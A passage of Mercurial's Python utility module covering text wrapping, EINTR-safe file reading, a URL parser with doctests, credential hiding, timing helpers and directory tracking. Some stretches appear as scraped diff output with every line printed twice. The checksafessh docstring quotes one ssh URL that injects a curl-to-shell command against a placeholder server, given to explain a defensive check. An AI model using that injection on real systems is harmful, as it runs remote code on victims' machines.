                # is the very beginning of the text (i.e. no lines started yet).
                if self.drop_whitespace and chunks[-1].strip() == r'' and lines:
                    del chunks[-1]

                while chunks:
                    l = colwidth(chunks[-1])

                    # Can at least squeeze this chunk onto the current line.
                    if cur_len + l <= width:
                        cur_line.append(chunks.pop())
                        cur_len += l

                    # Nope, this line is full.
                    else:
                        break

                # The current line is full, and the next chunk is too big to
                # fit on *any* line (not just this one).
                if chunks and colwidth(chunks[-1]) > width:
                    self._handle_long_word(chunks, cur_line, cur_len, width)

                # If the last chunk on this line is all whitespace, drop it.
                if (self.drop_whitespace and
                    cur_line and cur_line[-1].strip() == r''):
                    del cur_line[-1]

                # Convert current line back to a string and store it in list
                # of all lines (return value).
                if cur_line:
                    lines.append(indent + r''.join(cur_line))

            return lines

    # memoize: rebind the module-level name to the class itself, so
    # subsequent MBTextWrapper(**kwargs) calls construct 'tw' directly
    # without re-running this factory
    global MBTextWrapper
    MBTextWrapper = tw
    return tw(**kwargs)
2382
2382
def wrap(line, width, initindent='', hangindent=''):
    """Wrap a byte string to width display columns with the given indents."""
    maxindent = max(len(hangindent), len(initindent))
    if width <= maxindent:
        # adjust for weird terminal size
        width = max(78, maxindent + 1)
    # decode once per input using the configured charset/error mode
    codec = pycompat.sysstr(encoding.encoding)
    errs = pycompat.sysstr(encoding.encodingmode)
    line = line.decode(codec, errs)
    initindent = initindent.decode(codec, errs)
    hangindent = hangindent.decode(codec, errs)
    wrapper = MBTextWrapper(width=width,
                            initial_indent=initindent,
                            subsequent_indent=hangindent)
    return wrapper.fill(line).encode(codec)
2398
2398
if (pyplatform.python_implementation() == 'CPython' and
    sys.version_info < (3, 0)):
    # There is an issue in CPython that some IO methods do not handle EINTR
    # correctly. The following table shows what CPython version (and functions)
    # are affected (buggy: has the EINTR bug, okay: otherwise):
    #
    #            | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
    #   --------------------------------------------------
    #    fp.__iter__ | buggy   | buggy           | okay
    #    fp.read*    | buggy   | okay [1]        | okay
    #
    # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
    #
    # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
    # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
    #
    # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
    # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
    # CPython 2, because CPython 2 maintains an internal readahead buffer for
    # fp.__iter__ but not other fp.read* methods.
    #
    # On modern systems like Linux, the "read" syscall cannot be interrupted
    # when reading "fast" files like on-disk files. So the EINTR issue only
    # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
    # files approximately as "fast" files and use the fast (unsafe) code path,
    # to minimize the performance impact.
    if sys.version_info >= (2, 7, 4):
        # fp.readline deals with EINTR correctly, use it as a workaround.
        def _safeiterfile(fp):
            # iterate line by line via readline until it returns ''
            return iter(fp.readline, '')
    else:
        # fp.read* are broken too, manually deal with EINTR in a stupid way.
        # note: this may block longer than necessary because of bufsize.
        def _safeiterfile(fp, bufsize=4096):
            # Read raw chunks with os.read (retrying on EINTR) and yield
            # complete lines; a trailing partial line is yielded at EOF.
            fd = fp.fileno()
            line = ''
            while True:
                try:
                    buf = os.read(fd, bufsize)
                except OSError as ex:
                    # os.read only raises EINTR before any data is read
                    if ex.errno == errno.EINTR:
                        continue
                    else:
                        raise
                line += buf
                if '\n' in buf:
                    splitted = line.splitlines(True)
                    line = ''
                    for l in splitted:
                        if l[-1] == '\n':
                            # complete line: emit it
                            yield l
                        else:
                            # keep the partial tail for the next chunk
                            line = l
                if not buf:
                    # empty read means EOF
                    break
            if line:
                yield line

    def iterfile(fp):
        # Return an iterator over fp's lines that is safe against EINTR.
        # Regular on-disk files take the fast path (fp itself); other
        # descriptors (pipes, sockets, ttys) get the safe wrapper.
        fastpath = True
        if type(fp) is file:
            fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
        if fastpath:
            return fp
        else:
            return _safeiterfile(fp)
else:
    # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
    def iterfile(fp):
        return fp
2470
2470
def iterlines(iterator):
    """Flatten an iterator of text chunks into individual lines."""
    for data in iterator:
        lines = data.splitlines()
        for ln in lines:
            yield ln
2475
2475
def expandpath(path):
    """Expand environment variables, then ~user constructs, in path."""
    expanded = os.path.expandvars(path)
    return os.path.expanduser(expanded)
2478
2478
def hgcmd():
    """Return the command used to execute current hg

    This is different from hgexecutable() because on Windows we want
    to avoid things opening new shell windows like batch files, so we
    get either the python call or current executable.
    """
    if not mainfrozen():
        return gethgcmd()
    # frozen binary: report the executable itself
    if getattr(sys, 'frozen', None) == 'macosx_app':
        # Env variable set by py2app
        return [encoding.environ['EXECUTABLEPATH']]
    return [pycompat.sysexecutable]
2493
2493
def rundetached(args, condfn):
    """Execute the argument list in a detached process.

    condfn is a callable which is called repeatedly and should return
    True once the child process is known to have started successfully.
    At this point, the child process PID is returned. If the child
    process fails to start or finishes before condfn() evaluates to
    True, return -1.
    """
    # Windows case is easier because the child process is either
    # successfully starting and validating the condition or exiting
    # on failure. We just poll on its PID. On Unix, if the child
    # process fails to start, it will be left in a zombie state until
    # the parent wait on it, which we cannot do since we expect a long
    # running process on success. Instead we listen for SIGCHLD telling
    # us our child process terminated.
    terminated = set()
    def handler(signum, frame):
        # reap the dead child; os.wait() returns a (pid, status) tuple
        terminated.add(os.wait())
    prevhandler = None
    # SIGCHLD does not exist on Windows
    SIGCHLD = getattr(signal, 'SIGCHLD', None)
    if SIGCHLD is not None:
        prevhandler = signal.signal(SIGCHLD, handler)
    try:
        pid = spawndetached(args)
        while not condfn():
            # NOTE(review): 'terminated' holds (pid, status) tuples, so
            # 'pid in terminated' never matches a bare pid; testpid()
            # appears to do the real liveness check — confirm intent.
            # condfn() is re-checked after detecting death to avoid a
            # race where the child succeeded and then exited.
            if ((pid in terminated or not testpid(pid))
                and not condfn()):
                return -1
            time.sleep(0.1)
        return pid
    finally:
        # restore whatever SIGCHLD handler was installed before us
        if prevhandler is not None:
            signal.signal(signal.SIGCHLD, prevhandler)
2528
2528
def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
    """Return the result of interpolating items in the mapping into string s.

    prefix is a single character string, or a two character string with
    a backslash as the first character if the prefix needs to be escaped in
    a regular expression.

    fn is an optional function that will be applied to the replacement text
    just before replacement.

    escape_prefix is an optional flag that allows using doubled prefix for
    its escaping.

    Note: when escape_prefix is True, the caller's mapping dict is
    mutated (the bare prefix character is added, mapped to itself).
    """
    fn = fn or (lambda s: s)
    # build an alternation of all keys; the keys are not re-escaped, so
    # they are assumed to be regex-safe literals
    patterns = '|'.join(mapping.keys())
    if escape_prefix:
        # allow a doubled prefix to stand for a literal prefix character
        patterns += '|' + prefix
        if len(prefix) > 1:
            # drop the leading backslash used only for regex escaping
            prefix_char = prefix[1:]
        else:
            prefix_char = prefix
        mapping[prefix_char] = prefix_char
    r = remod.compile(r'%s(%s)' % (prefix, patterns))
    # the full match includes the one-character prefix; strip it to
    # recover the mapping key
    return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2553
2553
def getport(port):
    """Return the port for a given network service.

    If port is an integer, it's returned as is. If it's a string, it's
    looked up using socket.getservbyname(). If there's no matching
    service, error.Abort is raised.
    """
    try:
        return int(port)
    except ValueError:
        # not numeric: fall back to a service-name lookup
        try:
            return socket.getservbyname(port)
        except socket.error:
            raise Abort(_("no port number associated with service '%s'")
                        % port)
2570
2570
# Accepted spellings for boolean config values, all lowercase.
_booleans = {'1': True, 'yes': True, 'true': True, 'on': True, 'always': True,
             '0': False, 'no': False, 'false': False, 'off': False,
             'never': False}

def parsebool(s):
    """Parse s into a boolean.

    If s is not a valid boolean, returns None.
    """
    # matching is case-insensitive; dict.get() defaults to None
    return _booleans.get(s.lower())
2581
2581
2582 _hextochr = dict((a + b, chr(int(a + b, 16)))
2582 _hextochr = dict((a + b, chr(int(a + b, 16)))
2583 for a in string.hexdigits for b in string.hexdigits)
2583 for a in string.hexdigits for b in string.hexdigits)
2584
2584
2585 class url(object):
2585 class url(object):
2586 r"""Reliable URL parser.
2586 r"""Reliable URL parser.
2587
2587
2588 This parses URLs and provides attributes for the following
2588 This parses URLs and provides attributes for the following
2589 components:
2589 components:
2590
2590
2591 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2591 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2592
2592
2593 Missing components are set to None. The only exception is
2593 Missing components are set to None. The only exception is
2594 fragment, which is set to '' if present but empty.
2594 fragment, which is set to '' if present but empty.
2595
2595
2596 If parsefragment is False, fragment is included in query. If
2596 If parsefragment is False, fragment is included in query. If
2597 parsequery is False, query is included in path. If both are
2597 parsequery is False, query is included in path. If both are
2598 False, both fragment and query are included in path.
2598 False, both fragment and query are included in path.
2599
2599
2600 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2600 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2601
2601
2602 Note that for backward compatibility reasons, bundle URLs do not
2602 Note that for backward compatibility reasons, bundle URLs do not
2603 take host names. That means 'bundle://../' has a path of '../'.
2603 take host names. That means 'bundle://../' has a path of '../'.
2604
2604
2605 Examples:
2605 Examples:
2606
2606
2607 >>> url('http://www.ietf.org/rfc/rfc2396.txt')
2607 >>> url('http://www.ietf.org/rfc/rfc2396.txt')
2608 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2608 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2609 >>> url('ssh://[::1]:2200//home/joe/repo')
2609 >>> url('ssh://[::1]:2200//home/joe/repo')
2610 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2610 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2611 >>> url('file:///home/joe/repo')
2611 >>> url('file:///home/joe/repo')
2612 <url scheme: 'file', path: '/home/joe/repo'>
2612 <url scheme: 'file', path: '/home/joe/repo'>
2613 >>> url('file:///c:/temp/foo/')
2613 >>> url('file:///c:/temp/foo/')
2614 <url scheme: 'file', path: 'c:/temp/foo/'>
2614 <url scheme: 'file', path: 'c:/temp/foo/'>
2615 >>> url('bundle:foo')
2615 >>> url('bundle:foo')
2616 <url scheme: 'bundle', path: 'foo'>
2616 <url scheme: 'bundle', path: 'foo'>
2617 >>> url('bundle://../foo')
2617 >>> url('bundle://../foo')
2618 <url scheme: 'bundle', path: '../foo'>
2618 <url scheme: 'bundle', path: '../foo'>
2619 >>> url(r'c:\foo\bar')
2619 >>> url(r'c:\foo\bar')
2620 <url path: 'c:\\foo\\bar'>
2620 <url path: 'c:\\foo\\bar'>
2621 >>> url(r'\\blah\blah\blah')
2621 >>> url(r'\\blah\blah\blah')
2622 <url path: '\\\\blah\\blah\\blah'>
2622 <url path: '\\\\blah\\blah\\blah'>
2623 >>> url(r'\\blah\blah\blah#baz')
2623 >>> url(r'\\blah\blah\blah#baz')
2624 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2624 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2625 >>> url(r'file:///C:\users\me')
2625 >>> url(r'file:///C:\users\me')
2626 <url scheme: 'file', path: 'C:\\users\\me'>
2626 <url scheme: 'file', path: 'C:\\users\\me'>
2627
2627
2628 Authentication credentials:
2628 Authentication credentials:
2629
2629
2630 >>> url('ssh://joe:xyz@x/repo')
2630 >>> url('ssh://joe:xyz@x/repo')
2631 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2631 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2632 >>> url('ssh://joe@x/repo')
2632 >>> url('ssh://joe@x/repo')
2633 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2633 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2634
2634
2635 Query strings and fragments:
2635 Query strings and fragments:
2636
2636
2637 >>> url('http://host/a?b#c')
2637 >>> url('http://host/a?b#c')
2638 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2638 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2639 >>> url('http://host/a?b#c', parsequery=False, parsefragment=False)
2639 >>> url('http://host/a?b#c', parsequery=False, parsefragment=False)
2640 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2640 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2641
2641
2642 Empty path:
2642 Empty path:
2643
2643
2644 >>> url('')
2644 >>> url('')
2645 <url path: ''>
2645 <url path: ''>
2646 >>> url('#a')
2646 >>> url('#a')
2647 <url path: '', fragment: 'a'>
2647 <url path: '', fragment: 'a'>
2648 >>> url('http://host/')
2648 >>> url('http://host/')
2649 <url scheme: 'http', host: 'host', path: ''>
2649 <url scheme: 'http', host: 'host', path: ''>
2650 >>> url('http://host/#a')
2650 >>> url('http://host/#a')
2651 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2651 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2652
2652
2653 Only scheme:
2653 Only scheme:
2654
2654
2655 >>> url('http:')
2655 >>> url('http:')
2656 <url scheme: 'http'>
2656 <url scheme: 'http'>
2657 """
2657 """
2658
2658
    # Characters left unescaped by urlreq.quote() when __bytes__
    # re-serializes the user/passwd components.
    _safechars = "!~*'()+"
    # Same, for path-like components (path, fragment): additionally keeps
    # '/', ':' and '\' literal.
    _safepchars = "/!~*'()+:\\"
    # Matches an RFC 3986-style scheme prefix ("scheme:") at the start of
    # a string; used by __init__ to decide whether to split off a scheme.
    _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2662
2662
    def __init__(self, path, parsequery=True, parsefragment=True):
        """Parse *path* into scheme/user/passwd/host/port/path/query/fragment.

        parsequery/parsefragment let callers keep '?'/'#' as literal path
        characters.  Plain local paths, Windows drive-letter and UNC paths,
        and 'bundle:' paths are special-cased and never split further.
        """
        # We slowly chomp away at path until we have only the path left
        self.scheme = self.user = self.passwd = self.host = None
        self.port = self.path = self.query = self.fragment = None
        # _localpath stays True unless a scheme is recognized below
        self._localpath = True
        self._hostport = ''
        self._origpath = path

        if parsefragment and '#' in path:
            path, self.fragment = path.split('#', 1)

        # special case for Windows drive letters and UNC paths
        if hasdriveletter(path) or path.startswith('\\\\'):
            self.path = path
            return

        # For compatibility reasons, we can't handle bundle paths as
        # normal URLS
        if path.startswith('bundle:'):
            self.scheme = 'bundle'
            path = path[7:]
            if path.startswith('//'):
                path = path[2:]
            self.path = path
            return

        if self._matchscheme(path):
            parts = path.split(':', 1)
            if parts[0]:
                self.scheme, path = parts
                self._localpath = False

        # scheme-less or empty remainders short-circuit as local paths
        if not path:
            path = None
            if self._localpath:
                self.path = ''
                return
        else:
            if self._localpath:
                self.path = path
                return

        if parsequery and '?' in path:
            path, self.query = path.split('?', 1)
            if not path:
                path = None
            if not self.query:
                self.query = None

        # // is required to specify a host/authority
        if path and path.startswith('//'):
            parts = path[2:].split('/', 1)
            if len(parts) > 1:
                self.host, path = parts
            else:
                self.host = parts[0]
                path = None
            if not self.host:
                self.host = None
                # path of file:///d is /d
                # path of file:///d:/ is d:/, not /d:/
                if path and not hasdriveletter(path):
                    path = '/' + path

        if self.host and '@' in self.host:
            # rsplit so '@' inside the user/password part stays there
            self.user, self.host = self.host.rsplit('@', 1)
            if ':' in self.user:
                self.user, self.passwd = self.user.split(':', 1)
            if not self.host:
                self.host = None

        # Don't split on colons in IPv6 addresses without ports
        if (self.host and ':' in self.host and
            not (self.host.startswith('[') and self.host.endswith(']'))):
            self._hostport = self.host
            self.host, self.port = self.host.rsplit(':', 1)
            if not self.host:
                self.host = None

        if (self.host and self.scheme == 'file' and
            self.host not in ('localhost', '127.0.0.1', '[::1]')):
            raise Abort(_('file:// URLs can only refer to localhost'))

        self.path = path

        # leave the query string escaped
        for a in ('user', 'passwd', 'host', 'port',
                  'path', 'fragment'):
            v = getattr(self, a)
            if v is not None:
                setattr(self, a, urlreq.unquote(v))
2754
2754
2755 def __repr__(self):
2755 def __repr__(self):
2756 attrs = []
2756 attrs = []
2757 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2757 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2758 'query', 'fragment'):
2758 'query', 'fragment'):
2759 v = getattr(self, a)
2759 v = getattr(self, a)
2760 if v is not None:
2760 if v is not None:
2761 attrs.append('%s: %r' % (a, v))
2761 attrs.append('%s: %r' % (a, v))
2762 return '<url %s>' % ', '.join(attrs)
2762 return '<url %s>' % ', '.join(attrs)
2763
2763
    def __bytes__(self):
        r"""Join the URL's components back into a URL string.

        Examples:

        >>> str(url('http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
        'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
        >>> str(url('http://user:pw@host:80/?foo=bar&baz=42'))
        'http://user:pw@host:80/?foo=bar&baz=42'
        >>> str(url('http://user:pw@host:80/?foo=bar%3dbaz'))
        'http://user:pw@host:80/?foo=bar%3dbaz'
        >>> str(url('ssh://user:pw@[::1]:2200//home/joe#'))
        'ssh://user:pw@[::1]:2200//home/joe#'
        >>> str(url('http://localhost:80//'))
        'http://localhost:80//'
        >>> str(url('http://localhost:80/'))
        'http://localhost:80/'
        >>> str(url('http://localhost:80'))
        'http://localhost:80/'
        >>> str(url('bundle:foo'))
        'bundle:foo'
        >>> str(url('bundle://../foo'))
        'bundle:../foo'
        >>> str(url('path'))
        'path'
        >>> str(url('file:///tmp/foo/bar'))
        'file:///tmp/foo/bar'
        >>> str(url('file:///c:/tmp/foo/bar'))
        'file:///c:/tmp/foo/bar'
        >>> print url(r'bundle:foo\bar')
        bundle:foo\bar
        >>> print url(r'file:///D:\data\hg')
        file:///D:\data\hg
        """
        # local paths (and bundle: paths) round-trip without re-quoting
        if self._localpath:
            s = self.path
            if self.scheme == 'bundle':
                s = 'bundle:' + s
            if self.fragment:
                s += '#' + self.fragment
            return s

        s = self.scheme + ':'
        if self.user or self.passwd or self.host:
            s += '//'
        elif self.scheme and (not self.path or self.path.startswith('/')
                              or hasdriveletter(self.path)):
            # host-less absolute URL, e.g. file:///tmp/foo
            s += '//'
            if hasdriveletter(self.path):
                # file:///c:/... keeps the drive letter after a third '/'
                s += '/'
        if self.user:
            s += urlreq.quote(self.user, safe=self._safechars)
        if self.passwd:
            s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
        if self.user or self.passwd:
            s += '@'
        if self.host:
            # bracketed IPv6 literals are emitted verbatim
            if not (self.host.startswith('[') and self.host.endswith(']')):
                s += urlreq.quote(self.host)
            else:
                s += self.host
        if self.port:
            s += ':' + urlreq.quote(self.port)
        if self.host:
            s += '/'
        if self.path:
            # TODO: similar to the query string, we should not unescape the
            # path when we store it, the path might contain '%2f' = '/',
            # which we should *not* escape.
            s += urlreq.quote(self.path, safe=self._safepchars)
        if self.query:
            # we store the query in escaped form.
            s += '?' + self.query
        if self.fragment is not None:
            s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
        return s

    # on Python 3, str() transcodes the bytes form via encoding.strmethod
    __str__ = encoding.strmethod(__bytes__)
2842
2842
2843 def authinfo(self):
2843 def authinfo(self):
2844 user, passwd = self.user, self.passwd
2844 user, passwd = self.user, self.passwd
2845 try:
2845 try:
2846 self.user, self.passwd = None, None
2846 self.user, self.passwd = None, None
2847 s = bytes(self)
2847 s = bytes(self)
2848 finally:
2848 finally:
2849 self.user, self.passwd = user, passwd
2849 self.user, self.passwd = user, passwd
2850 if not self.user:
2850 if not self.user:
2851 return (s, None)
2851 return (s, None)
2852 # authinfo[1] is passed to urllib2 password manager, and its
2852 # authinfo[1] is passed to urllib2 password manager, and its
2853 # URIs must not contain credentials. The host is passed in the
2853 # URIs must not contain credentials. The host is passed in the
2854 # URIs list because Python < 2.4.3 uses only that to search for
2854 # URIs list because Python < 2.4.3 uses only that to search for
2855 # a password.
2855 # a password.
2856 return (s, (None, (s, self.host),
2856 return (s, (None, (s, self.host),
2857 self.user, self.passwd or ''))
2857 self.user, self.passwd or ''))
2858
2858
2859 def isabs(self):
2859 def isabs(self):
2860 if self.scheme and self.scheme != 'file':
2860 if self.scheme and self.scheme != 'file':
2861 return True # remote URL
2861 return True # remote URL
2862 if hasdriveletter(self.path):
2862 if hasdriveletter(self.path):
2863 return True # absolute for our purposes - can't be joined()
2863 return True # absolute for our purposes - can't be joined()
2864 if self.path.startswith(br'\\'):
2864 if self.path.startswith(br'\\'):
2865 return True # Windows UNC path
2865 return True # Windows UNC path
2866 if self.path.startswith('/'):
2866 if self.path.startswith('/'):
2867 return True # POSIX-style
2867 return True # POSIX-style
2868 return False
2868 return False
2869
2869
2870 def localpath(self):
2870 def localpath(self):
2871 if self.scheme == 'file' or self.scheme == 'bundle':
2871 if self.scheme == 'file' or self.scheme == 'bundle':
2872 path = self.path or '/'
2872 path = self.path or '/'
2873 # For Windows, we need to promote hosts containing drive
2873 # For Windows, we need to promote hosts containing drive
2874 # letters to paths with drive letters.
2874 # letters to paths with drive letters.
2875 if hasdriveletter(self._hostport):
2875 if hasdriveletter(self._hostport):
2876 path = self._hostport + '/' + self.path
2876 path = self._hostport + '/' + self.path
2877 elif (self.host is not None and self.path
2877 elif (self.host is not None and self.path
2878 and not hasdriveletter(path)):
2878 and not hasdriveletter(path)):
2879 path = '/' + path
2879 path = '/' + path
2880 return path
2880 return path
2881 return self._origpath
2881 return self._origpath
2882
2882
2883 def islocal(self):
2883 def islocal(self):
2884 '''whether localpath will return something that posixfile can open'''
2884 '''whether localpath will return something that posixfile can open'''
2885 return (not self.scheme or self.scheme == 'file'
2885 return (not self.scheme or self.scheme == 'file'
2886 or self.scheme == 'bundle')
2886 or self.scheme == 'bundle')
2887
2887
def hasscheme(path):
    """Report whether *path* parses as a URL with an explicit scheme."""
    scheme = url(path).scheme
    return bool(scheme)
2890
2890
def hasdriveletter(path):
    """True-ish when *path* begins with a Windows drive letter ('c:...').

    Note that a falsy *path* (empty string, None) is returned unchanged,
    so callers must treat the result as a truth value, not compare it
    to True/False.
    """
    return path and path[0:1].isalpha() and path[1:2] == ':'
2893
2893
def urllocalpath(path):
    """Shorthand: localpath() of *path* parsed with '?' and '#' kept
    as literal path characters."""
    u = url(path, parsequery=False, parsefragment=False)
    return u.localpath()
2896
2896
def checksafessh(path):
    """check if a path / url is a potentially unsafe ssh exploit (SEC)

    This is a sanity check for ssh urls. ssh will parse the first item as
    an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
    Let's prevent these potentially exploited urls entirely and warn the
    user.

    Raises an error.Abort when the url is unsafe.
    """
    path = urlreq.unquote(path)
    # a leading '-' in the host position is parsed by ssh as an option;
    # the same applies to svn+ssh subrepo urls, and '|' is rejected outright
    if '|' in path or path.startswith(('ssh://-', 'svn+ssh://-')):
        raise error.Abort(_('potentially unsafe url: %r') %
                          (path,))
2911
2912
def hidepassword(u):
    '''hide user credential in a url string'''
    parsed = url(u)
    if parsed.passwd:
        parsed.passwd = '***'
    return bytes(parsed)
2918
2919
def removeauth(u):
    '''remove all authentication information from a url string'''
    u = url(u)
    u.user = u.passwd = None
    # serialize with bytes() for consistency with hidepassword() above;
    # str() diverges on Python 3 since url.__str__ transcodes the bytes
    # form via encoding.strmethod.
    return bytes(u)
2924
2925
# Duration pretty-printer built from (threshold, unit-in-seconds, format)
# triples handed to unitcountfn() (defined earlier in this file); covers
# seconds down through ms/us/ns.
timecount = unitcountfn(
    (1, 1e3, _('%.0f s')),
    (100, 1, _('%.1f s')),
    (10, 1, _('%.2f s')),
    (1, 1, _('%.3f s')),
    (100, 0.001, _('%.1f ms')),
    (10, 0.001, _('%.2f ms')),
    (1, 0.001, _('%.3f ms')),
    (100, 0.000001, _('%.1f us')),
    (10, 0.000001, _('%.2f us')),
    (1, 0.000001, _('%.3f us')),
    (100, 0.000000001, _('%.1f ns')),
    (10, 0.000000001, _('%.2f ns')),
    (1, 0.000000001, _('%.3f ns')),
    )

# Current indentation (in spaces) of nested @timed reports; a one-element
# list so that all wrappers share the same mutable counter.
_timenesting = [0]
2942
2943
def timed(func):
    '''Report the execution time of a function call to stderr.

    During development, use as a decorator when you need to measure
    the cost of a function, e.g. as follows:

    @util.timed
    def foo(a, b, c):
        pass
    '''

    def wrapper(*args, **kwargs):
        started = timer()
        step = 2
        _timenesting[0] += step
        try:
            return func(*args, **kwargs)
        finally:
            # report even when func raises, at the nesting level of
            # the *enclosing* timed call
            duration = timer() - started
            _timenesting[0] -= step
            stderr.write('%s%s: %s\n'
                         % (' ' * _timenesting[0], func.__name__,
                            timecount(duration)))
    return wrapper
2967
2968
# Suffix -> multiplier table for sizetoint(); probed in order, so the
# single-letter units come before the '*b' spellings and plain 'b' is last.
_sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
              ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))

def sizetoint(s):
    '''Convert a space specifier to a byte count.

    >>> sizetoint('30')
    30
    >>> sizetoint('2.2kb')
    2252
    >>> sizetoint('6M')
    6291456
    '''
    spec = s.strip().lower()
    try:
        for suffix, multiplier in _sizeunits:
            if spec.endswith(suffix):
                return int(float(spec[:-len(suffix)]) * multiplier)
        # no recognized suffix: a bare integer
        return int(spec)
    except ValueError:
        raise error.ParseError(_("couldn't parse size: %s") % s)
2989
2990
class hooks(object):
    '''A collection of hook functions that can be used to extend a
    function's behavior. Hooks are called in lexicographic order,
    based on the names of their sources.'''

    def __init__(self):
        # (source, hook) pairs; kept unsorted until invocation
        self._hooks = []

    def add(self, source, hook):
        self._hooks.append((source, hook))

    def __call__(self, *args):
        # order the hooks by their source name before dispatching
        self._hooks.sort(key=lambda pair: pair[0])
        return [hookfn(*args) for _src, hookfn in self._hooks]
3007
3008
def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%s', depth=0):
    '''Yields lines for a nicely formatted stacktrace.
    Skips the 'skip' last entries, then return the last 'depth' entries.
    Each file+linenumber is formatted according to fileline.
    Each line is formatted according to line.
    If line is None, it yields:
      length of longest filepath+line number,
      filepath+linenumber,
      function

    Not be used in production code but very convenient while developing.
    '''
    # drop this generator's own frame plus 'skip' of the caller's frames
    stack = traceback.extract_stack()[:-skip - 1]
    entries = [(fileline % (fname, lineno), funcname)
               for fname, lineno, funcname, _text in stack][-depth:]
    if not entries:
        return
    # widest "file:line" string, used to align the function column
    fnmax = max(len(location) for location, _func in entries)
    for location, funcname in entries:
        if line is None:
            yield (fnmax, location, funcname)
        else:
            yield line % (fnmax, location, funcname)
3030
3031
def debugstacktrace(msg='stacktrace', skip=0,
                    f=stderr, otherf=stdout, depth=0):
    '''Writes a message to f (stderr) with a nicely formatted stacktrace.
    Skips the 'skip' entries closest to the call, then show 'depth' entries.
    By default it will flush stdout first.
    It can be used everywhere and intentionally does not require an ui object.
    Not be used in production code but very convenient while developing.
    '''
    if otherf:
        # keep the trace from interleaving with buffered stdout output
        otherf.flush()
    f.write('%s at:\n' % msg.rstrip())
    # skip + 1 hides this function's own frame from the report
    for frameline in getstackframes(skip + 1, depth=depth):
        f.write(frameline)
    f.flush()
3045
3046
class dirs(object):
    '''a multiset of directory names from a dirstate or manifest'''

    def __init__(self, map, skip=None):
        # ancestor directory name -> number of tracked paths beneath it
        self._dirs = {}
        if skip is not None and safehasattr(map, 'iteritems'):
            # dirstate-like mapping of filename -> state tuple; entries
            # whose state equals 'skip' do not contribute
            for fname, entry in map.iteritems():
                if entry[0] != skip:
                    self.addpath(fname)
        else:
            for fname in map:
                self.addpath(fname)

    def addpath(self, path):
        # bump every ancestor of path; stop at the first one already
        # known, since its own ancestors were counted when it was added
        counters = self._dirs
        for ancestor in finddirs(path):
            if ancestor in counters:
                counters[ancestor] += 1
                return
            counters[ancestor] = 1

    def delpath(self, path):
        # inverse of addpath: drop ancestors whose count reaches zero,
        # then decrement the first survivor and stop
        counters = self._dirs
        for ancestor in finddirs(path):
            if counters[ancestor] > 1:
                counters[ancestor] -= 1
                return
            del counters[ancestor]

    def __iter__(self):
        return iter(self._dirs)

    def __contains__(self, d):
        return d in self._dirs
3081
3082
# Prefer the C implementation of dirs from the parsers module when it is
# available, replacing the pure Python class above.
if safehasattr(parsers, 'dirs'):
    dirs = parsers.dirs
3084
3085
def finddirs(path):
    """Yield each ancestor directory of a '/'-separated *path*, deepest
    first: 'a/b/c' -> 'a/b', 'a'.  A path with no '/' yields nothing."""
    cut = path.rfind('/')
    while cut >= 0:
        yield path[:cut]
        cut = path.rfind('/', 0, cut)
3090
3091
3091 # compression code
3092 # compression code
3092
3093
# Role identifiers used when querying wire protocol compression support.
SERVERROLE = 'server'
CLIENTROLE = 'client'

# Describes a compression engine's wire protocol support: its wire
# identifier plus an integer priority for each role (consumed where
# engines are registered/selected elsewhere in this file).
compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
                                               (u'name', u'serverpriority',
                                                u'clientpriority'))
3099
3100
3100 class compressormanager(object):
3101 class compressormanager(object):
3101 """Holds registrations of various compression engines.
3102 """Holds registrations of various compression engines.
3102
3103
3103 This class essentially abstracts the differences between compression
3104 This class essentially abstracts the differences between compression
3104 engines to allow new compression formats to be added easily, possibly from
3105 engines to allow new compression formats to be added easily, possibly from
3105 extensions.
3106 extensions.
3106
3107
3107 Compressors are registered against the global instance by calling its
3108 Compressors are registered against the global instance by calling its
3108 ``register()`` method.
3109 ``register()`` method.
3109 """
3110 """
3110 def __init__(self):
3111 def __init__(self):
3111 self._engines = {}
3112 self._engines = {}
3112 # Bundle spec human name to engine name.
3113 # Bundle spec human name to engine name.
3113 self._bundlenames = {}
